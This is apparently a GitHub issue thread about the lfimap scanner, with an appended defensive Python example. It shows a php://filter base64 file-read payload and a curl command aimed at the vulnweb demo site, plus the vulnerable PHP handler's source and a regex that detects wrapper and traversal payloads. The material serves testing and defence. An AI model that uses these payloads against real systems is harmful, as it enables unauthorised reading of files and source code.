Closed sajeeshab closed 2 years ago
Hi, Thank you for taking an interest in lfimap.
I believe that to fix the issue the -U argument is needed, not --url.
Please try running lfimap with the following command:
python3 lfimap.py -U http://testphp.vulnweb.com/showimage.php?file=PWN
└─$ python3 lfimap.py -U http://testphp.vulnweb.com/showimage.php?file=PWN -v
[!] Cookie argument ('-C') is not provided. lfimap might have troubles finding vulnerabilities if web app requires a cookie.
[i] Testing filter wrapper...
[+] LFI -> 'http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=showimage.php'
[i] Testing input wrapper...
[i] Testing data wrapper...
[i] Testing expect wrapper...
[i] Testing remote file inclusion...
[i] Testing file wrapper inclusion...
[i] Testing path truncation using 'wordlists/short.txt' wordlist...
Done.
For me it works well when '-U' is provided; make sure you cloned the latest commit from the repo. Please let me know if you solved your problem or need any more info.
@Sajeeshab The vulnerability is successfully found and can be confirmed with the following:
curl "http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=showimage.php"
[base64-encoded output omitted]
To decode output:
echo "<base64 output from the curl command above>" | base64 -d
showimage.php code is disclosed, meaning arbitrary file read is possible with the base64 exfiltration technique. This is technically not an LFI but a file read vulnerability, since the fpassthru function is used and not include/require, and the content-type in the response headers is image/jpeg.
This means that you can also read PHP source code with curl http://testphp.vulnweb.com/showimage.php?file=showimage.php
<?php
// header("Content-Length: 1" /*. filesize($name)*/);
if( isset($_GET["file"]) && !isset($_GET["size"]) ){
    // open the file in a binary mode
    header("Content-Type: image/jpeg");
    $name = $_GET["file"];
    $fp = fopen($name, 'rb');
    // send the right headers
    header("Content-Type: image/jpeg");
    // dump the picture and stop the script
    fpassthru($fp);
    exit;
}
elseif (isset($_GET["file"]) && isset($_GET["size"])){
    header("Content-Type: image/jpeg");
    $name = $_GET["file"];
    $fp = fopen($name, 'rb');
    // send the right headers
    header("Content-Type: image/jpeg");
    // dump the picture and stop the script
    fpassthru($fp);
    exit;
}
?>
Hope this helps.
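As an added example (not part of this issue thread and not lfimap's own code), the Python below shows the two things a defender would take from the comment above: how a file-serving handler like showimage.php should resolve the `file` parameter so that a stream wrapper or a traversal string never reaches the filesystem call, and a small check that flags the wrapper payloads lfimap probes for (php://filter, php://input, data:, expect:, file://, `../`) in web server access-log lines. The log lines, the `cat.jpg` fixture and the function names are constructed for the example.

```python
"""Hardened path resolution for a showimage.php-style handler, plus a log
check for stream-wrapper / traversal payloads in the `file` parameter.
Constructed example; not code from lfimap or from the issue."""
import os
import re
import tempfile
from pathlib import Path
from urllib.parse import parse_qs, unquote, urlsplit

# Stream wrappers and traversal fragments in the position showimage.php
# passes straight to fopen(). Matched against the URL-decoded value.
WRAPPER_RE = re.compile(
    r"^(php|file|data|expect|phar|zip|glob|ftp|https?)://|^data:|\.\./|\.\.\\",
    re.IGNORECASE,
)


def resolve_image(base_dir, requested):
    """Map a user-supplied name to a file strictly inside base_dir.

    Returns the resolved Path, or None when the request must be refused.
    Unlike fopen($name) in showimage.php, only a plain basename with an
    image extension is accepted, so "php://filter/..." and "../x" are
    rejected before any filesystem call, and a symlink that escapes
    base_dir is caught by the resolve() check.
    """
    name = os.path.basename(requested)
    if name != requested or name in ("", ".", ".."):
        return None  # directory component, wrapper scheme or traversal
    if not name.lower().endswith((".jpg", ".jpeg")):
        return None  # showimage.php is meant to serve images only
    base = Path(base_dir).resolve()
    target = (base / name).resolve()
    if target.parent != base or not target.is_file():
        return None  # resolved outside base_dir, or not a regular file
    return target


def suspicious_file_params(log_lines, param="file"):
    """Return (line_number, decoded_value) for every access-log line whose
    `file` query parameter carries a stream wrapper or traversal sequence."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs decodes once; unquote again so double-encoded "..%252F"
        # payloads are also caught.
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            decoded = unquote(value)
            if WRAPPER_RE.search(decoded):
                hits.append((n, decoded))
    return hits


# Constructed access-log sample (combined log format, trimmed).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /showimage.php?file=cat.jpg HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /showimage.php?file=php://filter/convert.base64-encode/resource=showimage.php HTTP/1.1" 200 900',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /showimage.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1400',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /showimage.php?file=showimage.php HTTP/1.1" 200 700',
]


def demo():
    """Build a throwaway image directory and exercise both functions."""
    base = tempfile.mkdtemp(prefix="images-")
    with open(os.path.join(base, "cat.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff")  # JPEG SOI marker, enough for the check
    return {
        "plain_image": resolve_image(base, "cat.jpg") is not None,
        "filter_wrapper": resolve_image(
            base, "php://filter/convert.base64-encode/resource=showimage.php"),
        "traversal": resolve_image(base, "../cat.jpg"),
        "php_source": resolve_image(base, "showimage.php"),
        "flagged_lines": [n for n, _ in suspicious_file_params(SAMPLE_LOG)],
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val}")
```

Note the fourth log line: a request for `showimage.php` by its plain name carries no wrapper or traversal marker, so pattern matching alone does not flag it, which is exactly the source-read case the comment above points out. That request is stopped only by the handler-side rule in `resolve_image` (image extensions inside one directory), so the allowlist in the application, not the log check, is the actual fix.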
lfimap.py: error: unrecognized arguments: --url http://testphp.vulnweb.com/showimage.php?file=PWN